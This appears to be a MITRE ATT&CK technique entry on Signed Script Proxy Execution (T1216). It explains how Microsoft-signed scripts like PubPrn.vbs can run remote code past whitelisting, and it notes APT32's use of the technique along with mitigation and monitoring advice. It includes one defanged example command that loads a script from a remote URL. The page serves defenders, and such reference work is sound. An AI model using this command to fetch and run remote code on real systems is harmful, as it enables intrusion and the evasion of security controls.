The sub-techniques beta is now live! Read the release blog post for more info.

Signed Script Proxy Execution

Scripts signed with trusted certificates can be used to proxy execution of malicious files. This behavior may bypass signature validation restrictions and application whitelisting solutions that do not account for use of these scripts.

PubPrn.vbs is signed by Microsoft and can be used to proxy execution from a remote site. [1] Example command: cscript C[:]\Windows\System32\Printing_Admin_Scripts\en-US\pubprn[.]vbs script:http[:]//

There are several other signed scripts that may be used in a similar manner. [2]

ID: T1216
Tactic: Defense Evasion, Execution
Platform: Windows
Permissions Required: User
Data Sources: Process monitoring, Process command-line parameters
Defense Bypassed: Application whitelisting, Digital Certificate Validation
Contributors: Praetorian
Version: 1.0
Created: 18 April 2018
Last Modified: 24 June 2019

Procedure Examples

Name Description

APT32 has used PubPrn.vbs within execution scripts to execute malware, possibly bypassing defenses.[3]


Mitigation Description
Execution Prevention

Certain signed scripts that can be used to execute other programs may not be necessary within a given environment. Use application whitelisting configured to block execution of these scripts if they are not required for a given system or network to prevent potential misuse by adversaries.


Monitor script processes, such as cscript, and command-line parameters for scripts like PubPrn.vbs that may be used to proxy execution of malicious files.